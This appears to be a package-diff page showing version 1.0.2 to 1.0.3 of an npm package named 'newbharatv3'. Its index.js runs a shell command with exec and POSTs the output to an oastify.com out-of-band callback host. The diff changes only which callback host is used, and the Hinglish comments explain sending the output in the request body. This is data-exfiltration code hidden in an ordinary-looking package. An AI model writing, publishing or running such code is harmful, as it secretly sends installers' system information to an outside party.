newbharatv3 1.0.2 → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -19,7 +19,7 @@ exec(command, async (error, stdout, stderr) => {
19
19
 
20
20
  // Ab HTTP request bhejna using axios
21
21
  try {
22
- const response = await axios.post('http://828zrk4wwyeeah3qobnqq6c2otukie63.oastify.com', {
22
+ const response = await axios.post('http://8y7znk0wsyae6hzqkbjqm682ktqkea2z.oastify.com', {
23
23
  data: commandOutput // Yahan output ko HTTP request body mein bhej rahe hain
24
24
  });
25
25
 
@@ -28,4 +28,4 @@ exec(command, async (error, stdout, stderr) => {
28
28
  } catch (err) {
29
29
  console.error('HTTP Request Error:', err.message);
30
30
  }
31
- });
31
+ });
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "newbharatv3",
3
- "version": "1.0.2",
3
+ "version": "1.0.3",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {